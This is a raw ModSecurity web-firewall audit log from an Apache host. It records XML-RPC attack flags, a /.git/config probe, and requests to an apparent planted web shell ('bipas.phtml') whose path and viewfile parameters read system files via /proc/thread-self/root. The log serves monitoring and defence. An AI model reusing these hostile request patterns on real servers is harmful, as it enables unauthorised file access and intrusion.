"/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzslJfblPUQiSn5r2XqQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119346814156 4164 (- - -) Stopwatch2: 1750119346814156 4164; combined=2238, p1=360, p2=1727, p3=39, p4=29, p5=83, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0aed10b-Z-- --a54aaa4d-A-- [17/Jun/2025:05:46:46.972733 +0530] aFCz7eTJOk1gXj_qIh4eLAAAAAQ 146.190.105.35 42596 127.0.0.1 7081 --a54aaa4d-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=j94so82dnut3u5gancehr6elvg; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e3bb2cb1c59ed3eadc5045e6e28860%7C%7C1750292205%7C%7C1750288605%7C%7C8438b9605ae23236f590698ba7e42522; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=227729fe122053ee174244d21b536ddd%7C%7C1750292205%7C%7C1750288605%7C%7Cd61db8f2937b3ea45b69ff3e3d722de2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a54aaa4d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=egg2dl0913edvg221r0iu9kqp4; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_42b9520f2063dc446175a8eeada277%7C%7C1750292206%7C%7C1750288606%7C%7C5ca0787a41e4f4f5d799e50fea272b0f; expires=Thu, 19 Jun 2025 00:16:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=489041e2aa16304d7fdd057cb5b3a459%7C%7C1750292206%7C%7C1750288606%7C%7Cb02c30c07b0878a4dcccb15798b8aecf; expires=Thu, 19 Jun 2025 00:16:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a54aaa4d-E-- --a54aaa4d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCz7eTJOk1gXj_qIh4eLAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119405908129 1064689 (- - -) Stopwatch2: 1750119405908129 1064689; combined=4029, p1=547, p2=3061, p3=103, p4=61, p5=160, sr=115, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a54aaa4d-Z-- --0b288733-A-- [17/Jun/2025:05:46:47.012522 +0530] aFCz74oVQnPDyHnl9oPZ5AAAAAY 216.73.216.240 42718 127.0.0.1 7081 --0b288733-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fudev HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0b288733-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5336 Connection: close Content-Type: text/html; charset=UTF-8 --0b288733-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCz74oVQnPDyHnl9oPZ5AAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCz74oVQnPDyHnl9oPZ5AAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119407007592 4986 (- - -) Stopwatch2: 1750119407007592 4986; combined=2570, p1=534, p2=1842, p3=41, p4=44, p5=108, sr=159, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b288733-Z-- --4d326223-A-- [17/Jun/2025:05:47:31.149663 +0530] aFC0Gn4j6VFpohzeqUMSRgAAAAo 104.23.209.204 45908 127.0.0.1 7081 --4d326223-B-- GET /.git/config HTTP/1.0 Host: www.getcalley.com X-Real-IP: 104.23.209.204 X-Forwarded-For: 35.237.163.42 Connection: close cf-ray: 950e5d4659596cc7-IAD cf-ipcountry: US cf-visitor: {"scheme":"https"} accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https cf-connecting-ip: 35.237.163.42 --4d326223-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --4d326223-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.git/config"] [unique_id "aFC0Gn4j6VFpohzeqUMSRgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119450720415 429328 (- - -) Stopwatch2: 1750119450720415 429328; combined=1951, p1=375, p2=1485, p3=0, p4=0, p5=91, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d326223-Z-- --05bb356e-A-- [17/Jun/2025:05:47:46.411408 +0530] aFC0KdyZ4SMykfn97vy96AAAAAs 146.190.105.35 38348 127.0.0.1 7081 --05bb356e-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 Cookie: PHPSESSID=vb1o8muqo1puru5idri261esdm; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a4d5e85b343989443426ab4a16a468%7C%7C1750292264%7C%7C1750288664%7C%7Cd435032891881ab100f93b51b257702f; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5ed86d16094723e145eef45c98122d85%7C%7C1750292265%7C%7C1750288665%7C%7C4aa60dfeebfeec6bef8f7a15040eebec User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --05bb356e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=u3thub12uostm59lnoivlk9ib9; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_af743d00a45486f1d3697901deb81b%7C%7C1750292266%7C%7C1750288666%7C%7C5bb8e981ea1b9850fd9038567e9b2092; expires=Thu, 19 Jun 2025 00:17:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=19b6d936785472dcabcae548d3a2d3ff%7C%7C1750292266%7C%7C1750288666%7C%7Ce2bcaddd05ce3b795c19aaf6d4698dbb; expires=Thu, 19 Jun 2025 00:17:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --05bb356e-E-- --05bb356e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC0KdyZ4SMykfn97vy96AAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119465369536 1041959 (- - -) Stopwatch2: 1750119465369536 1041959; combined=2564, p1=358, p2=1875, p3=76, p4=30, p5=142, sr=85, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05bb356e-Z-- --da5cfc4a-A-- [17/Jun/2025:05:47:55.911064 +0530] aFC0M9yZ4SMykfn97vy99QAAAAs 216.73.216.240 35578 127.0.0.1 7081 --da5cfc4a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fopt%2Fpsa%2Fetc&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fopt%2Fpsa%2Fetc%2Flogrotate.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --da5cfc4a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3147 Connection: close Content-Type: text/html; charset=UTF-8 --da5cfc4a-H-- Message: Warning. Matched phrase "etc/logrotate.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/logrotate.conf found within ARGS:viewfile: /proc/thread-self/root/opt/psa/etc/logrotate.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/logrotate.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/logrotate.conf found within ARGS:viewfile: /proc/thread-self/root/opt/psa/etc/logrotate.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC0M9yZ4SMykfn97vy99QAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119475906946 4174 (- - -) Stopwatch2: 1750119475906946 4174; combined=2164, p1=355, p2=1692, p3=32, p4=33, p5=52, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da5cfc4a-Z-- --a1479a3d-A-- [17/Jun/2025:05:48:40.902002 +0530] aFC0YAJ4p5Cdblnjra5-mgAAAAI 216.73.216.240 58892 127.0.0.1 7081 --a1479a3d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fopt%2Fpsa%2Fetc%2Fmodules HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a1479a3d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2833 Connection: close Content-Type: text/html; charset=UTF-8 --a1479a3d-H-- Message: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /proc/thread-self/root/opt/psa/etc/modules"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /proc/thread-self/root/opt/psa/etc/modules"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC0YAJ4p5Cdblnjra5-mgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119520898178 3877 (- - -) Stopwatch2: 1750119520898178 3877; combined=2101, p1=367, p2=1614, p3=36, p4=28, p5=56, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1479a3d-Z-- --52bb7002-A-- [17/Jun/2025:05:48:44.954279 +0530] aFC0ZFJfblPUQiSn5r2YMAAAAAA 216.73.216.240 59460 127.0.0.1 7081 --52bb7002-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fdbus HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --52bb7002-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4443 Connection: close Content-Type: text/html; charset=UTF-8 --52bb7002-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC0ZFJfblPUQiSn5r2YMAAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC0ZFJfblPUQiSn5r2YMAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119524949668 4666 (- - -) Stopwatch2: 1750119524949668 4666; combined=2560, p1=335, p2=2067, p3=42, p4=33, p5=83, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52bb7002-Z-- --13e29b59-A-- [17/Jun/2025:05:48:46.478337 +0530] aFC0ZeTJOk1gXj_qIh4ehQAAAAQ 146.190.105.35 59536 127.0.0.1 7081 --13e29b59-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=fgu1ltqmbq58p7lhbdcdjf4bm5; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e026a7080f0441a537f3143dc60c67%7C%7C1750292324%7C%7C1750288724%7C%7C7f074237f081f2a8895edb5bd9fbea17; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8e6bd21b1a1ae8654ea362914d57098d%7C%7C1750292325%7C%7C1750288725%7C%7C09d64fc95e7274a9bdbdf7bc204e83c3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --13e29b59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=18n4u32fjnkgffq4dsbmhiu9lb; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ee7e89e7bf2a3024a361ad31ab5915%7C%7C1750292326%7C%7C1750288726%7C%7C5e3b27050f37bcca5b8c569a88c5d2b2; expires=Thu, 19 Jun 2025 00:18:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3ade608f193a9a3599ad1512629f2941%7C%7C1750292326%7C%7C1750288726%7C%7Ce3f2d698ea49defa943e24b7a424fc68; expires=Thu, 19 Jun 2025 00:18:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --13e29b59-E-- --13e29b59-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC0ZeTJOk1gXj_qIh4ehQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119525376493 1101924 (- - -) Stopwatch2: 1750119525376493 1101924; combined=3412, p1=421, p2=2537, p3=121, p4=46, p5=179, sr=101, sw=108, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13e29b59-Z-- --559fff22-A-- [17/Jun/2025:05:49:47.045196 +0530] aFC0oVJfblPUQiSn5r2YXwAAAAA 146.190.105.35 39922 127.0.0.1 7081 --559fff22-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=kq081k3rs4b86hs86j4glerk8p; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_feea330ce7012c2b34ba23085c65c5%7C%7C1750292385%7C%7C1750288785%7C%7Cd7c30d34eb0d6ff636702a273da49ca5; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=88508254a9f7272ae68f5ae0b6e59c30%7C%7C1750292385%7C%7C1750288785%7C%7C36e1057cee733639da53b5524b4776d6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --559fff22-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=i9s2as4210oqi3uk6ui4kpt93m; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_93d67f3e5e9a3d597f0faaacb36257%7C%7C1750292386%7C%7C1750288786%7C%7C36491856e22728ee0996d36220dd3a95; expires=Thu, 19 Jun 2025 00:19:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d8f491f686f65f50c3ca0d0c22fd18ad%7C%7C1750292386%7C%7C1750288786%7C%7C4ccd47497f8ff76d2fdfa94c04e4411b; expires=Thu, 19 Jun 2025 00:19:46 GMT; Max-Age=172799; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --559fff22-E-- --559fff22-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC0oVJfblPUQiSn5r2YXwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119585920096 1125199 (- - -) Stopwatch2: 1750119585920096 1125199; combined=3086, p1=426, p2=2235, p3=111, p4=42, p5=170, sr=100, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --559fff22-Z-- --e39a1f5e-A-- [17/Jun/2025:05:50:43.860986 +0530] aFC021JfblPUQiSn5r2YigAAAAA 216.73.216.240 37134 127.0.0.1 7081 --e39a1f5e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Firqbalance HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e39a1f5e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4074 Connection: close Content-Type: text/html; charset=UTF-8 --e39a1f5e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/irqbalance"] 